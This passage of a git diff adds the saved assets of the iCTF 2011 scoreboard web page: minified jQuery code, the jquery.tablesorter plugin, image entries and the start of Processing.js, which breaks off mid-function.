J=this[0],G=J.offsetParent,F=J,O=J.ownerDocument,M,H=O.documentElement,K=O.body,L=O.defaultView,E=L.getComputedStyle(J,null),N=J.offsetTop,I=J.offsetLeft;while((J=J.parentNode)&&J!==K&&J!==H){M=L.getComputedStyle(J,null);N-=J.scrollTop,I-=J.scrollLeft;if(J===G){N+=J.offsetTop,I+=J.offsetLeft;if(o.offset.doesNotAddBorder&&!(o.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(J.tagName))){N+=parseInt(M.borderTopWidth,10)||0,I+=parseInt(M.borderLeftWidth,10)||0}F=G,G=J.offsetParent}if(o.offset.subtractsBorderForOverflowNotVisible&&M.overflow!=="visible"){N+=parseInt(M.borderTopWidth,10)||0,I+=parseInt(M.borderLeftWidth,10)||0}E=M}if(E.position==="relative"||E.position==="static"){N+=K.offsetTop,I+=K.offsetLeft}if(E.position==="fixed"){N+=Math.max(H.scrollTop,K.scrollTop),I+=Math.max(H.scrollLeft,K.scrollLeft)}return{top:N,left:I}}}o.offset={initialize:function(){if(this.initialized){return}var L=document.body,F=document.createElement("div"),H,G,N,I,M,E,J=L.style.marginTop,K='<div style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;"><div></div></div><table style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;" cellpadding="0" cellspacing="0"><tr><td></td></tr></table>';M={position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"};for(E in M){F.style[E]=M[E]}F.innerHTML=K;L.insertBefore(F,L.firstChild);H=F.firstChild,G=H.firstChild,I=H.nextSibling.firstChild.firstChild;this.doesNotAddBorder=(G.offsetTop!==5);this.doesAddBorderForTableAndCells=(I.offsetTop===5);H.style.overflow="hidden",H.style.position="relative";this.subtractsBorderForOverflowNotVisible=(G.offsetTop===-5);L.style.marginTop="1px";this.doesNotIncludeMarginInBodyOffset=(L.offsetTop===0);L.style.marginTop=J;L.removeChild(F);this.initialized=true},bodyOffset:function(E){o.offset.initialized||o.offset.initialize();var G=E.offsetTop,F=E.offsetLeft;if(o.offset.doesNotIncludeMarginInBodyOffset){G+=parseInt(o.curCSS(E,"marginTop",true),10)||0,F+=parseInt(o.curCSS(E,"marginLeft",true),10)||0}return{top:G,left:F}}};o.fn.extend({position:function(){var I=0,H=0,F;if(this[0]){var G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})(); +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011.info_files/jquery.tablesorter.min.js b/ictf2011/scoreboard.ictf2011.info_files/jquery.tablesorter.min.js @@ -0,0 +1,4 @@ + +(function($){$.extend({tablesorter:new +function(){var parsers=[],widgets=[];this.defaults={cssHeader:"header",cssAsc:"headerSortUp",cssDesc:"headerSortDown",cssChildRow:"expand-child",sortInitialOrder:"asc",sortMultiSortKey:"shiftKey",sortForce:null,sortAppend:null,sortLocaleCompare:true,textExtraction:"simple",parsers:{},widgets:[],widgetZebra:{css:["even","odd"]},headers:{},widthFixed:false,cancelSelection:true,sortList:[],headerList:[],dateFormat:"us",decimal:'/\.|\,/g',onRenderHeader:null,selectorHeaders:'thead th',debug:false};function benchmark(s,d){log(s+","+(new Date().getTime()-d.getTime())+"ms");}this.benchmark=benchmark;function log(s){if(typeof console!="undefined"&&typeof console.debug!="undefined"){console.log(s);}else{alert(s);}}function buildParserCache(table,$headers){if(table.config.debug){var parsersDebug="";}if(table.tBodies.length==0)return;var rows=table.tBodies[0].rows;if(rows[0]){var list=[],cells=rows[0].cells,l=cells.length;for(var i=0;i<l;i++){var p=false;if($.metadata&&($($headers[i]).metadata()&&$($headers[i]).metadata().sorter)){p=getParserById($($headers[i]).metadata().sorter);}else if((table.config.headers[i]&&table.config.headers[i].sorter)){p=getParserById(table.config.headers[i].sorter);}if(!p){p=detectParserForColumn(table,rows,-1,i);}if(table.config.debug){parsersDebug+="column:"+i+" parser:"+p.id+"\n";}list.push(p);}}if(table.config.debug){log(parsersDebug);}return list;};function detectParserForColumn(table,rows,rowIndex,cellIndex){var l=parsers.length,node=false,nodeValue=false,keepLooking=true;while(nodeValue==''&&keepLooking){rowIndex++;if(rows[rowIndex]){node=getNodeFromRowAndCellIndex(rows,rowIndex,cellIndex);nodeValue=trimAndGetNodeText(table.config,node);if(table.config.debug){log('Checking if value was empty on row:'+rowIndex);}}else{keepLooking=false;}}for(var i=1;i<l;i++){if(parsers[i].is(nodeValue,table,node)){return parsers[i];}}return parsers[0];}function getNodeFromRowAndCellIndex(rows,rowIndex,cellIndex){return rows[rowIndex].cells[cellIndex];}function trimAndGetNodeText(config,node){return $.trim(getElementText(config,node));}function getParserById(name){var l=parsers.length;for(var i=0;i<l;i++){if(parsers[i].id.toLowerCase()==name.toLowerCase()){return parsers[i];}}return false;}function buildCache(table){if(table.config.debug){var cacheTime=new Date();}var totalRows=(table.tBodies[0]&&table.tBodies[0].rows.length)||0,totalCells=(table.tBodies[0].rows[0]&&table.tBodies[0].rows[0].cells.length)||0,parsers=table.config.parsers,cache={row:[],normalized:[]};for(var i=0;i<totalRows;++i){var c=$(table.tBodies[0].rows[i]),cols=[];if(c.hasClass(table.config.cssChildRow)){cache.row[cache.row.length-1]=cache.row[cache.row.length-1].add(c);continue;}cache.row.push(c);for(var j=0;j<totalCells;++j){cols.push(parsers[j].format(getElementText(table.config,c[0].cells[j]),table,c[0].cells[j]));}cols.push(cache.normalized.length);cache.normalized.push(cols);cols=null;};if(table.config.debug){benchmark("Building cache for "+totalRows+" rows:",cacheTime);}return cache;};function getElementText(config,node){var text="";if(!node)return"";if(!config.supportsTextContent)config.supportsTextContent=node.textContent||false;if(config.textExtraction=="simple"){if(config.supportsTextContent){text=node.textContent;}else{if(node.childNodes[0]&&node.childNodes[0].hasChildNodes()){text=node.childNodes[0].innerHTML;}else{text=node.innerHTML;}}}else{if(typeof(config.textExtraction)=="function"){text=config.textExtraction(node);}else{text=$(node).text();}}return text;}function appendToTable(table,cache){if(table.config.debug){var appendTime=new Date()}var c=cache,r=c.row,n=c.normalized,totalRows=n.length,checkCell=(n[0].length-1),tableBody=$(table.tBodies[0]),rows=[];for(var i=0;i<totalRows;i++){var pos=n[i][checkCell];rows.push(r[pos]);if(!table.config.appender){var l=r[pos].length;for(var j=0;j<l;j++){tableBody[0].appendChild(r[pos][j]);}}}if(table.config.appender){table.config.appender(table,rows);}rows=null;if(table.config.debug){benchmark("Rebuilt table:",appendTime);}applyWidget(table);setTimeout(function(){$(table).trigger("sortEnd");},0);};function buildHeaders(table){if(table.config.debug){var time=new Date();}var meta=($.metadata)?true:false;var header_index=computeTableHeaderCellIndexes(table);$tableHeaders=$(table.config.selectorHeaders,table).each(function(index){this.column=header_index[this.parentNode.rowIndex+"-"+this.cellIndex];this.order=formatSortingOrder(table.config.sortInitialOrder);this.count=this.order;if(checkHeaderMetadata(this)||checkHeaderOptions(table,index))this.sortDisabled=true;if(checkHeaderOptionsSortingLocked(table,index))this.order=this.lockedOrder=checkHeaderOptionsSortingLocked(table,index);if(!this.sortDisabled){var $th=$(this).addClass(table.config.cssHeader);if(table.config.onRenderHeader)table.config.onRenderHeader.apply($th);}table.config.headerList[index]=this;});if(table.config.debug){benchmark("Built headers:",time);log($tableHeaders);}return $tableHeaders;};function computeTableHeaderCellIndexes(t){var matrix=[];var lookup={};var thead=t.getElementsByTagName('THEAD')[0];var trs=thead.getElementsByTagName('TR');for(var i=0;i<trs.length;i++){var cells=trs[i].cells;for(var j=0;j<cells.length;j++){var c=cells[j];var rowIndex=c.parentNode.rowIndex;var cellId=rowIndex+"-"+c.cellIndex;var rowSpan=c.rowSpan||1;var colSpan=c.colSpan||1 +var firstAvailCol;if(typeof(matrix[rowIndex])=="undefined"){matrix[rowIndex]=[];}for(var k=0;k<matrix[rowIndex].length+1;k++){if(typeof(matrix[rowIndex][k])=="undefined"){firstAvailCol=k;break;}}lookup[cellId]=firstAvailCol;for(var k=rowIndex;k<rowIndex+rowSpan;k++){if(typeof(matrix[k])=="undefined"){matrix[k]=[];}var matrixrow=matrix[k];for(var l=firstAvailCol;l<firstAvailCol+colSpan;l++){matrixrow[l]="x";}}}}return lookup;}function checkCellColSpan(table,rows,row){var arr=[],r=table.tHead.rows,c=r[row].cells;for(var i=0;i<c.length;i++){var cell=c[i];if(cell.colSpan>1){arr=arr.concat(checkCellColSpan(table,headerArr,row++));}else{if(table.tHead.length==1||(cell.rowSpan>1||!r[row+1])){arr.push(cell);}}}return arr;};function checkHeaderMetadata(cell){if(($.metadata)&&($(cell).metadata().sorter===false)){return true;};return false;}function checkHeaderOptions(table,i){if((table.config.headers[i])&&(table.config.headers[i].sorter===false)){return true;};return false;}function checkHeaderOptionsSortingLocked(table,i){if((table.config.headers[i])&&(table.config.headers[i].lockedOrder))return table.config.headers[i].lockedOrder;return false;}function applyWidget(table){var c=table.config.widgets;var l=c.length;for(var i=0;i<l;i++){getWidgetById(c[i]).format(table);}}function getWidgetById(name){var l=widgets.length;for(var i=0;i<l;i++){if(widgets[i].id.toLowerCase()==name.toLowerCase()){return widgets[i];}}};function formatSortingOrder(v){if(typeof(v)!="Number"){return(v.toLowerCase()=="desc")?1:0;}else{return(v==1)?1:0;}}function isValueInArray(v,a){var l=a.length;for(var i=0;i<l;i++){if(a[i][0]==v){return true;}}return false;}function setHeadersCss(table,$headers,list,css){$headers.removeClass(css[0]).removeClass(css[1]);var h=[];$headers.each(function(offset){if(!this.sortDisabled){h[this.column]=$(this);}});var l=list.length;for(var i=0;i<l;i++){h[list[i][0]].addClass(css[list[i][1]]);}}function fixColumnWidth(table,$headers){var c=table.config;if(c.widthFixed){var colgroup=$('<colgroup>');$("tr:first td",table.tBodies[0]).each(function(){colgroup.append($('<col>').css('width',$(this).width()));});$(table).prepend(colgroup);};}function updateHeaderSortCount(table,sortList){var c=table.config,l=sortList.length;for(var i=0;i<l;i++){var s=sortList[i],o=c.headerList[s[0]];o.count=s[1];o.count++;}}function multisort(table,sortList,cache){if(table.config.debug){var sortTime=new Date();}var dynamicExp="var sortWrapper = function(a,b) {",l=sortList.length;for(var i=0;i<l;i++){var c=sortList[i][0];var order=sortList[i][1];var s=(table.config.parsers[c].type=="text")?((order==0)?makeSortFunction("text","asc",c):makeSortFunction("text","desc",c)):((order==0)?makeSortFunction("numeric","asc",c):makeSortFunction("numeric","desc",c));var e="e"+i;dynamicExp+="var "+e+" = "+s;dynamicExp+="if("+e+") { return "+e+"; } ";dynamicExp+="else { ";}var orgOrderCol=cache.normalized[0].length-1;dynamicExp+="return a["+orgOrderCol+"]-b["+orgOrderCol+"];";for(var i=0;i<l;i++){dynamicExp+="}; ";}dynamicExp+="return 0; ";dynamicExp+="}; ";if(table.config.debug){benchmark("Evaling expression:"+dynamicExp,new Date());}eval(dynamicExp);cache.normalized.sort(sortWrapper);if(table.config.debug){benchmark("Sorting on "+sortList.toString()+" and dir "+order+" time:",sortTime);}return cache;};function makeSortFunction(type,direction,index){var a="a["+index+"]",b="b["+index+"]";if(type=='text'&&direction=='asc'){return"("+a+" == "+b+" ? 0 : ("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : ("+a+" < "+b+") ? -1 : 1 )));";}else if(type=='text'&&direction=='desc'){return"("+a+" == "+b+" ? 0 : ("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : ("+b+" < "+a+") ? -1 : 1 )));";}else if(type=='numeric'&&direction=='asc'){return"("+a+" === null && "+b+" === null) ? 0 :("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : "+a+" - "+b+"));";}else if(type=='numeric'&&direction=='desc'){return"("+a+" === null && "+b+" === null) ? 0 :("+a+" === null ? Number.POSITIVE_INFINITY : ("+b+" === null ? Number.NEGATIVE_INFINITY : "+b+" - "+a+"));";}};function makeSortText(i){return"((a["+i+"] < b["+i+"]) ? -1 : ((a["+i+"] > b["+i+"]) ? 1 : 0));";};function makeSortTextDesc(i){return"((b["+i+"] < a["+i+"]) ? -1 : ((b["+i+"] > a["+i+"]) ? 1 : 0));";};function makeSortNumeric(i){return"a["+i+"]-b["+i+"];";};function makeSortNumericDesc(i){return"b["+i+"]-a["+i+"];";};function sortText(a,b){if(table.config.sortLocaleCompare)return a.localeCompare(b);return((a<b)?-1:((a>b)?1:0));};function sortTextDesc(a,b){if(table.config.sortLocaleCompare)return b.localeCompare(a);return((b<a)?-1:((b>a)?1:0));};function sortNumeric(a,b){return a-b;};function sortNumericDesc(a,b){return b-a;};function getCachedSortType(parsers,i){return parsers[i].type;};this.construct=function(settings){return this.each(function(){if(!this.tHead||!this.tBodies)return;var $this,$document,$headers,cache,config,shiftDown=0,sortOrder;this.config={};config=$.extend(this.config,$.tablesorter.defaults,settings);$this=$(this);$.data(this,"tablesorter",config);$headers=buildHeaders(this);this.config.parsers=buildParserCache(this,$headers);cache=buildCache(this);var sortCSS=[config.cssDesc,config.cssAsc];fixColumnWidth(this);$headers.click(function(e){var totalRows=($this[0].tBodies[0]&&$this[0].tBodies[0].rows.length)||0;if(!this.sortDisabled&&totalRows>0){$this.trigger("sortStart");var $cell=$(this);var i=this.column;this.order=this.count++%2;if(this.lockedOrder)this.order=this.lockedOrder;if(!e[config.sortMultiSortKey]){config.sortList=[];if(config.sortForce!=null){var a=config.sortForce;for(var j=0;j<a.length;j++){if(a[j][0]!=i){config.sortList.push(a[j]);}}}config.sortList.push([i,this.order]);}else{if(isValueInArray(i,config.sortList)){for(var j=0;j<config.sortList.length;j++){var s=config.sortList[j],o=config.headerList[s[0]];if(s[0]==i){o.count=s[1];o.count++;s[1]=o.count%2;}}}else{config.sortList.push([i,this.order]);}};setTimeout(function(){setHeadersCss($this[0],$headers,config.sortList,sortCSS);appendToTable($this[0],multisort($this[0],config.sortList,cache));},1);return false;}}).mousedown(function(){if(config.cancelSelection){this.onselectstart=function(){return false};return false;}});$this.bind("update",function(){var me=this;setTimeout(function(){me.config.parsers=buildParserCache(me,$headers);cache=buildCache(me);},1);}).bind("updateCell",function(e,cell){var config=this.config;var pos=[(cell.parentNode.rowIndex-1),cell.cellIndex];cache.normalized[pos[0]][pos[1]]=config.parsers[pos[1]].format(getElementText(config,cell),cell);}).bind("sorton",function(e,list){$(this).trigger("sortStart");config.sortList=list;var sortList=config.sortList;updateHeaderSortCount(this,sortList);setHeadersCss(this,$headers,sortList,sortCSS);appendToTable(this,multisort(this,sortList,cache));}).bind("appendCache",function(){appendToTable(this,cache);}).bind("applyWidgetId",function(e,id){getWidgetById(id).format(this);}).bind("applyWidgets",function(){applyWidget(this);});if($.metadata&&($(this).metadata()&&$(this).metadata().sortlist)){config.sortList=$(this).metadata().sortlist;}if(config.sortList.length>0){$this.trigger("sorton",[config.sortList]);}applyWidget(this);});};this.addParser=function(parser){var l=parsers.length,a=true;for(var i=0;i<l;i++){if(parsers[i].id.toLowerCase()==parser.id.toLowerCase()){a=false;}}if(a){parsers.push(parser);};};this.addWidget=function(widget){widgets.push(widget);};this.formatFloat=function(s){var i=parseFloat(s);return(isNaN(i))?0:i;};this.formatInt=function(s){var i=parseInt(s);return(isNaN(i))?0:i;};this.isDigit=function(s,config){return/^[-+]?\d*$/.test($.trim(s.replace(/[,.']/g,'')));};this.clearTableBody=function(table){if($.browser.msie){function empty(){while(this.firstChild)this.removeChild(this.firstChild);}empty.apply(table.tBodies[0]);}else{table.tBodies[0].innerHTML="";}};}});$.fn.extend({tablesorter:$.tablesorter.construct});var ts=$.tablesorter;ts.addParser({id:"text",is:function(s){return true;},format:function(s){return $.trim(s.toLocaleLowerCase());},type:"text"});ts.addParser({id:"digit",is:function(s,table){var c=table.config;return $.tablesorter.isDigit(s,c);},format:function(s){return $.tablesorter.formatFloat(s);},type:"numeric"});ts.addParser({id:"currency",is:function(s){return/^[£$€?.]/.test(s);},format:function(s){return $.tablesorter.formatFloat(s.replace(new RegExp(/[£$€]/g),""));},type:"numeric"});ts.addParser({id:"ipAddress",is:function(s){return/^\d{2,3}[\.]\d{2,3}[\.]\d{2,3}[\.]\d{2,3}$/.test(s);},format:function(s){var a=s.split("."),r="",l=a.length;for(var i=0;i<l;i++){var item=a[i];if(item.length==2){r+="0"+item;}else{r+=item;}}return $.tablesorter.formatFloat(r);},type:"numeric"});ts.addParser({id:"url",is:function(s){return/^(https?|ftp|file):\/\/$/.test(s);},format:function(s){return jQuery.trim(s.replace(new RegExp(/(https?|ftp|file):\/\//),''));},type:"text"});ts.addParser({id:"isoDate",is:function(s){return/^\d{4}[\/-]\d{1,2}[\/-]\d{1,2}$/.test(s);},format:function(s){return $.tablesorter.formatFloat((s!="")?new Date(s.replace(new RegExp(/-/g),"/")).getTime():"0");},type:"numeric"});ts.addParser({id:"percent",is:function(s){return/\%$/.test($.trim(s));},format:function(s){return $.tablesorter.formatFloat(s.replace(new RegExp(/%/g),""));},type:"numeric"});ts.addParser({id:"usLongDate",is:function(s){return s.match(new RegExp(/^[A-Za-z]{3,10}\.? [0-9]{1,2}, ([0-9]{4}|'?[0-9]{2}) (([0-2]?[0-9]:[0-5][0-9])|([0-1]?[0-9]:[0-5][0-9]\s(AM|PM)))$/));},format:function(s){return $.tablesorter.formatFloat(new Date(s).getTime());},type:"numeric"});ts.addParser({id:"shortDate",is:function(s){return/\d{1,2}[\/\-]\d{1,2}[\/\-]\d{2,4}/.test(s);},format:function(s,table){var c=table.config;s=s.replace(/\-/g,"/");if(c.dateFormat=="us"){s=s.replace(/(\d{1,2})[\/\-](\d{1,2})[\/\-](\d{4})/,"$3/$1/$2");}else if(c.dateFormat=="uk"){s=s.replace(/(\d{1,2})[\/\-](\d{1,2})[\/\-](\d{4})/,"$3/$2/$1");}else if(c.dateFormat=="dd/mm/yy"||c.dateFormat=="dd-mm-yy"){s=s.replace(/(\d{1,2})[\/\-](\d{1,2})[\/\-](\d{2})/,"$1/$2/$3");}return $.tablesorter.formatFloat(new Date(s).getTime());},type:"numeric"});ts.addParser({id:"time",is:function(s){return/^(([0-2]?[0-9]:[0-5][0-9])|([0-1]?[0-9]:[0-5][0-9]\s(am|pm)))$/.test(s);},format:function(s){return $.tablesorter.formatFloat(new Date("2000/01/01 "+s).getTime());},type:"numeric"});ts.addParser({id:"metadata",is:function(s){return false;},format:function(s,table,cell){var c=table.config,p=(!c.parserMetadataName)?'sortValue':c.parserMetadataName;return $(cell).metadata()[p];},type:"numeric"});ts.addWidget({id:"zebra",format:function(table){if(table.config.debug){var time=new Date();}var $tr,row=-1,odd;$("tr:visible",table.tBodies[0]).each(function(i){$tr=$(this);if(!$tr.hasClass(table.config.cssChildRow))row++;odd=(row%2==0);$tr.removeClass(table.config.widgetZebra.css[odd?0:1]).addClass(table.config.widgetZebra.css[odd?1:0])});if(table.config.debug){$.tablesorter.benchmark("Applying Zebra widget",time);}}});})(jQuery); +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011.info_files/locked.png b/ictf2011/scoreboard.ictf2011.info_files/locked.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/my.png b/ictf2011/scoreboard.ictf2011.info_files/my.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/nl.png b/ictf2011/scoreboard.ictf2011.info_files/nl.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/off.gif b/ictf2011/scoreboard.ictf2011.info_files/off.gif Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/on.gif b/ictf2011/scoreboard.ictf2011.info_files/on.gif Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/processing-1.3.6.min.js b/ictf2011/scoreboard.ictf2011.info_files/processing-1.3.6.min.js @@ -0,0 +1,13 @@ +/*** + + P R O C E S S I N G . J S - 1.3.6 + a port of the Processing visualization language + + Processing.js is licensed under the MIT License, see LICENSE. + For a list of copyright holders, please refer to AUTHORS. + + http://processingjs.org + +***/ + +(function(B,d,o,r){var E=function(){};var q=function(){if("console" in B){return function(L){B.console.log("Processing.js: "+L)}}return E()}();var u=function(L){var M=new XMLHttpRequest;M.open("GET",L,false);if(M.overrideMimeType){M.overrideMimeType("text/plain")}M.setRequestHeader("If-Modified-Since","Fri, 01 Jan 1960 00:00:00 GMT");M.send(null);if(M.status!==200&&M.status!==0){throw"XMLHttpRequest failed, status code "+M.status}return M.responseText};var l="document" in this&&!("fake" in this.document);d.head=d.head||d.getElementsByTagName("head")[0];function A(L,M){if(L in B){return B[L]}if(typeof B[M]==="function"){return B[M]}return function(O){if(O instanceof Array){return O}if(typeof O==="number"){var N=[];N.length=O;return N}}}var e=A("Float32Array","WebGLFloatArray"),I=A("Int32Array","WebGLIntArray"),w=A("Uint16Array","WebGLUnsignedShortArray"),b=A("Uint8Array","WebGLUnsignedByteArray");var z={X:0,Y:1,Z:2,R:3,G:4,B:5,A:6,U:7,V:8,NX:9,NY:10,NZ:11,EDGE:12,SR:13,SG:14,SB:15,SA:16,SW:17,TX:18,TY:19,TZ:20,VX:21,VY:22,VZ:23,VW:24,AR:25,AG:26,AB:27,DR:3,DG:4,DB:5,DA:6,SPR:28,SPG:29,SPB:30,SHINE:31,ER:32,EG:33,EB:34,BEEN_LIT:35,VERTEX_FIELD_COUNT:36,P2D:1,JAVA2D:1,WEBGL:2,P3D:2,OPENGL:2,PDF:0,DXF:0,OTHER:0,WINDOWS:1,MAXOSX:2,LINUX:3,EPSILON:0.0001,MAX_FLOAT:3.4028235e+38,MIN_FLOAT:-3.4028235e+38,MAX_INT:2147483647,MIN_INT:-2147483648,PI:o.PI,TWO_PI:2*o.PI,HALF_PI:o.PI/2,THIRD_PI:o.PI/3,QUARTER_PI:o.PI/4,DEG_TO_RAD:o.PI/180,RAD_TO_DEG:180/o.PI,WHITESPACE:" \t\n\r\u000c\u00a0",RGB:1,ARGB:2,HSB:3,ALPHA:4,CMYK:5,TIFF:0,TARGA:1,JPEG:2,GIF:3,BLUR:11,GRAY:12,INVERT:13,OPAQUE:14,POSTERIZE:15,THRESHOLD:16,ERODE:17,DILATE:18,REPLACE:0,BLEND:1<<0,ADD:1<<1,SUBTRACT:1<<2,LIGHTEST:1<<3,DARKEST:1<<4,DIFFERENCE:1<<5,EXCLUSION:1<<6,MULTIPLY:1<<7,SCREEN:1<<8,OVERLAY:1<<9,HARD_LIGHT:1<<10,SOFT_LIGHT:1<<11,DODGE:1<<12,BURN:1<<13,ALPHA_MASK:4278190080,RED_MASK:16711680,GREEN_MASK:65280,BLUE_MASK:255,CUSTOM:0,ORTHOGRAPHIC:2,PERSPECTIVE:3,POINT:2,POINTS:2,LINE:4,LINES:4,TRIANGLE:8,TRIANGLES:9,TRIANGLE_STRIP:10,TRIANGLE_FAN:11,QUAD:16,QUADS:16,QUAD_STRIP:17,POLYGON:20,PATH:21,RECT:30,ELLIPSE:31,ARC:32,SPHERE:40,BOX:41,GROUP:0,PRIMITIVE:1,GEOMETRY:3,VERTEX:0,BEZIER_VERTEX:1,CURVE_VERTEX:2,BREAK:3,CLOSESHAPE:4,OPEN:1,CLOSE:2,CORNER:0,CORNERS:1,RADIUS:2,CENTER_RADIUS:2,CENTER:3,DIAMETER:3,CENTER_DIAMETER:3,BASELINE:0,TOP:101,BOTTOM:102,NORMAL:1,NORMALIZED:1,IMAGE:2,MODEL:4,SHAPE:5,SQUARE:"butt",ROUND:"round",PROJECT:"square",MITER:"miter",BEVEL:"bevel",AMBIENT:0,DIRECTIONAL:1,SPOT:3,BACKSPACE:8,TAB:9,ENTER:10,RETURN:13,ESC:27,DELETE:127,CODED:65535,SHIFT:16,CONTROL:17,ALT:18,CAPSLK:20,PGUP:33,PGDN:34,END:35,HOME:36,LEFT:37,UP:38,RIGHT:39,DOWN:40,F1:112,F2:113,F3:114,F4:115,F5:116,F6:117,F7:118,F8:119,F9:120,F10:121,F11:122,F12:123,NUMLK:144,META:157,INSERT:155,ARROW:"default",CROSS:"crosshair",HAND:"pointer",MOVE:"move",TEXT:"text",WAIT:"wait",NOCURSOR:"url('data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='), auto",DISABLE_OPENGL_2X_SMOOTH:1,ENABLE_OPENGL_2X_SMOOTH:-1,ENABLE_OPENGL_4X_SMOOTH:2,ENABLE_NATIVE_FONTS:3,DISABLE_DEPTH_TEST:4,ENABLE_DEPTH_TEST:-4,ENABLE_DEPTH_SORT:5,DISABLE_DEPTH_SORT:-5,DISABLE_OPENGL_ERROR_REPORT:6,ENABLE_OPENGL_ERROR_REPORT:-6,ENABLE_ACCURATE_TEXTURES:7,DISABLE_ACCURATE_TEXTURES:-7,HINT_COUNT:10,SINCOS_LENGTH:720,PRECISIONB:15,PRECISIONF:1<<15,PREC_MAXVAL:(1<<15)-1,PREC_ALPHA_SHIFT:24-15,PREC_RED_SHIFT:16-15,NORMAL_MODE_AUTO:0,NORMAL_MODE_SHAPE:1,NORMAL_MODE_VERTEX:2,MAX_LIGHTS:8};function h(N){if(typeof N==="string"){var M=0;for(var L=0;L<N.length;++L){M=M*31+N.charCodeAt(L)&4294967295}return M}if(typeof N!=="object"){return N&4294967295}if(N.hashCode instanceof Function){return N.hashCode()}if(N.$id===r){N.$id=o.floor(o.random()*65536)-32768<<16|o.floor(o.random()*65536)}return N.$id}function p(M,L){if(M===null||L===null){return M===null&&L===null}if(typeof M==="string"){return M===L}if(typeof M!=="object"){return M===L}if(M.equals instanceof Function){return M.equals(L)}return M===L}var m=function(M){if(M.iterator instanceof Function){return M.iterator()}if(M instanceof Array){var L=-1;this.hasNext=function(){return ++L<M.length};this.next=function(){return M[L]}}else{throw"Unable to iterate: "+M}};var f=function(){function M(O){var N=0;this.hasNext=function(){return N<O.length};this.next=function(){return O[N++]};this.remove=function(){O.splice(N,1)}}function L(){var N;if(arguments.length===0){N=[]}else{if(arguments.length>0&&typeof arguments[0]!=="number"){N=arguments[0].toArray()}else{N=[];N.length=0|arguments[0]}}this.get=function(O){return N[O]};this.contains=function(O){return this.indexOf(O)>-1};this.indexOf=function(Q){for(var P=0,O=N.length;P<O;++P){if(p(Q,N[P])){return P}}return -1};this.add=function(){if(arguments.length===1){N.push(arguments[0])}else{if(arguments.length===2){var O=arguments[0];if(typeof O==="number"){if(O>=0&&O<=N.length){N.splice(O,0,arguments[1])}else{throw O+" is not a valid index"}}else{throw typeof O+" is not a number"}}else{throw"Please use the proper number of parameters."}}};this.addAll=function(P,O){var Q;if(typeof P==="number"){if(P<0||P>N.length){throw"Index out of bounds for addAll: "+P+" greater or equal than "+N.length}Q=new m(O);while(Q.hasNext()){N.splice(P++,0,Q.next())}}else{Q=new m(P);while(Q.hasNext()){N.push(Q.next())}}};this.set=function(){if(arguments.length===2){var O=arguments[0];if(typeof O==="number"){if(O>=0&&O<N.length){N.splice(O,1,arguments[1])}else{throw O+" is not a valid index."}}else{throw typeof O+" is not a number"}}else{throw"Please use the proper number of parameters."}};this.size=function(){return N.length};this.clear=function(){N.length=0};this.remove=function(O){if(typeof O==="number"){return N.splice(O,1)[0]}O=this.indexOf(O);if(O>-1){N.splice(O,1);return true}return false};this.isEmpty=function(){return !N.length};this.clone=function(){return new L(this)};this.toArray=function(){return N.slice(0)};this.iterator=function(){return new M(N)}}return L}();var v=function(){function L(){if(arguments.length===1&&arguments[0] instanceof L){return arguments[0].clone()}var U=arguments.length>0?arguments[0]:16;var V=arguments.length>1?arguments[1]:0.75;var O=[];O.length=U;var Q=0;var M=this;function S(X){var W=h(X)%O.length;return W<0?O.length+W:W}function P(){if(Q<=V*O.length){return}var Z=[];for(var Y=0;Y<O.length;++Y){if(O[Y]!==r){Z=Z.concat(O[Y])}}var aa=O.length*2;O=[];O.length=aa;for(var X=0;X<Z.length;++X){var W=S(Z[X].key);var ab=O[W];if(ab===r){O[W]=ab=[]}ab.push(Z[X])}}function N(aa,ab){var W=0;var Z=-1;var Y=false;function X(){while(!Y){++Z;if(W>=O.length){Y=true}else{if(O[W]===r||Z>=O[W].length){Z=-1;++W}else{return}}}}this.hasNext=function(){return !Y};this.next=function(){var ac=aa(O[W][Z]);X();return ac};this.remove=function(){ab(this.next());--Z};X()}function 